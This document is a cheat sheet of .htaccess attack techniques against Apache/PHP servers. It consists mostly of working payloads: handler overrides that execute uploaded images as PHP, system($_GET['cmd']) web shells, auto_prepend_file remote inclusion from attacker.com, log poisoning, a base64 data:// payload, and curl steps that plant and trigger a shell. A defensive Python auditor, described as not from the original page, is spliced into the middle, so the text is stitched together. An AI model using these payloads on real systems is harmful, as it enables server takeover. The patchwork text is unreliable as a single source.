.htaccess Attack Vectors & Security Bypasses
This document consolidates attack techniques using the .htaccess file, from basic to advanced. It includes file upload exploitation, PHP configuration injection, and security filter bypass techniques.
Table of Contents
- Part 1: Basic - File Upload Exploitation
- Part 2: Intermediate - PHP Config Injection
- Part 3: Advanced - Bypass & Deep Exploitation Techniques
- Part 4: Real-world Attack Scenarios
- Notes & Disclaimer
Part 1: Basic - File Upload Exploitation
These techniques are commonly used when .htaccess files can be uploaded but .php file uploads are blocked.
1.1 Changing Handler to Execute Image Files as PHP
Allows files with extensions such as .jpg, .png, .txt to be processed as PHP.
Example (.htaccess):
AddType application/x-httpd-php .jpg .png .gif .txt
Explanation: AddType assigns a PHP MIME type to selected extensions.
Usage:
Upload shell.jpg containing PHP code; it will be executed.
Effect: Bypasses filters that only allow image uploads.
1.2 Basic SetHandler
Example:
<FilesMatch "shell\.(jpg|png|txt)$">
SetHandler application/x-httpd-php
</FilesMatch>
Explanation: FilesMatch applies rules to files matching the regex pattern.
1.3 ForceType
Example:
<Files "hack">
ForceType application/x-httpd-php
</Files>
Explanation: Forces PHP execution regardless of file extension.
Part 2: Intermediate - PHP Config Injection
Modify PHP runtime configuration via .htaccess (requires AllowOverride Options or equivalent).
2.1 PHP Value Injection
Technique 1: auto_prepend_file
Example:
php_value auto_prepend_file "/etc/passwd"
php_value auto_prepend_file "php://input"
Explanation: Automatically includes a file before any PHP script executes.
Technique 2: include_path
Example:
php_value include_path "Z:/path/with/<?php system($_GET['cmd']); ?>"
Explanation: PHP may parse code embedded inside include_path.
2.2 Remote File Inclusion (RFI)
Example:
php_flag allow_url_fopen On
php_flag allow_url_include On
php_value auto_prepend_file "http://attacker.com/shell.txt"
Advantage: No need to upload a shell to the target server.
2.3 Log Poisoning via .htaccess
Example:
php_value error_log "/var/www/html/shell.php"
php_value include_path "<?php system($_GET['cmd']); ?>"
Attack Flow:
- Redirect error_log to a writable or accessible file
- Trigger errors containing attacker-controlled payload
- Include the poisoned log file to achieve RCE
Part 3: Advanced - Bypass & Deep Exploitation Techniques
3.1 Filter Bypass with Line Continuation
Example:
php_value auto_prepend_fi\
le "php://input"
Explanation: Apache concatenates lines ending with a backslash during parsing.
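A defensive check for the continuation trick in 3.1, added here as an example (not code from the original page): an .htaccess auditor that joins backslash continuations before matching, so a directive split across lines is still flagged. The directive list, function names and sample file are assumptions made for this illustration, and the joining rule is a simplified model of Apache's parser.

```python
import re

# Directives this page abuses: handler/type mappings that route files to PHP,
# and the php_value / php_flag settings it names (list is an assumption).
HANDLER = re.compile(r"^\s*(AddType|AddHandler|SetHandler|ForceType)\s+\S*php", re.I)
PHP_INI = re.compile(
    r"^\s*php_(?:value|flag)\s+(auto_prepend_file|auto_append_file|include_path"
    r"|error_log|allow_url_fopen|allow_url_include)\b", re.I)

def logical_lines(text):
    """Join continuation lines: a physical line ending in one backslash is glued
    to the next line, backslash and newline dropped (simplified model of Apache)."""
    out, buf, start = [], "", None
    for n, raw in enumerate(text.splitlines(), 1):
        start = n if start is None else start
        if raw.endswith("\\") and not raw.endswith("\\\\"):
            buf += raw[:-1]
            continue
        out.append((start, buf + raw))
        buf, start = "", None
    if buf:  # file ended in the middle of a continuation
        out.append((start, buf))
    return out

def audit(text, join_continuations=True):
    """Return sorted (first_line_number, matched_keyword) findings."""
    lines = list(enumerate(text.splitlines(), 1))
    if join_continuations:
        lines += logical_lines(text)  # scan both views so neither hides a directive
    found = set()
    for n, line in lines:
        m = HANDLER.match(line) or PHP_INI.match(line)
        if m:
            found.add((n, m.group(1).lower()))
    return sorted(found)

# Constructed sample .htaccess built from directives quoted on this page.
SAMPLE = (
    "Options -Indexes\n"
    "AddType image/svg+xml .svg\n"
    "php_value auto_prepend_fi\\\n"
    'le "php://input"\n'
    '<FilesMatch "shell\\.(jpg|png|txt)$">\n'
    "SetHandler application/x-httpd-php\n"
    "</FilesMatch>\n"
)

if __name__ == "__main__":
    print("line-by-line:", audit(SAMPLE, join_continuations=False))
    print("joined      :", audit(SAMPLE))
```

Rejecting uploaded .htaccess files outright and setting AllowOverride None on upload directories removes the precondition listed in the Notes; a scanner like this is for auditing files that already exist in a web root.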
3.2 Chained Exploitation
Example:
php_flag allow_url_include On
php_value auto_append_file "data://text/plain;base64,PD9waHAgZWNobyAnU2hlbGwgQWN0aXZhdGVkJzsgPz4="
AddType application/x-httpd-php .phtml .phar .inc
3.3 Apache Expression & Header Injection
Example:
<If "%{REQUEST_URI} =~ /test/">
Header set X-Powered-By "<?php system('id'); ?>"
</If>
3.4 Mod_Rewrite Exploitation
Example:
RewriteEngine On
RewriteCond %{QUERY_STRING} ^cmd=(.*)$
RewriteRule ^.*$ - [E=CMD:%1]
<If "%{ENV:CMD} != ''">
php_value auto_prepend_file "data://text/plain,<?php system(getenv('CMD')); ?>"
</If>
3.5 Nested .htaccess (Double Layer)
Example:
<Files ".hidden">
ForceType application/x-httpd-php
</Files>
Part 4: Real-world Attack Scenarios
Scenario 1: Upload .htaccess + Shell
Steps:
echo 'AddType application/x-httpd-php .jpg' > .htaccess
echo '<?php system($_GET["cmd"]); ?>' > shell.jpg
curl 'http://target.com/uploads/shell.jpg?cmd=id'
Scenario 2: Log Poisoning
Steps:
curl 'http://target.com/?page=non_existent'
curl 'http://target.com/poison.php?c=whoami'
Notes & Disclaimer
Notes:
- Write access to .htaccess is required
- Target directory must allow overrides
- Often combined with file upload vulnerabilities
Disclaimer: This document is for security research and educational purposes only. Unauthorized use is illegal.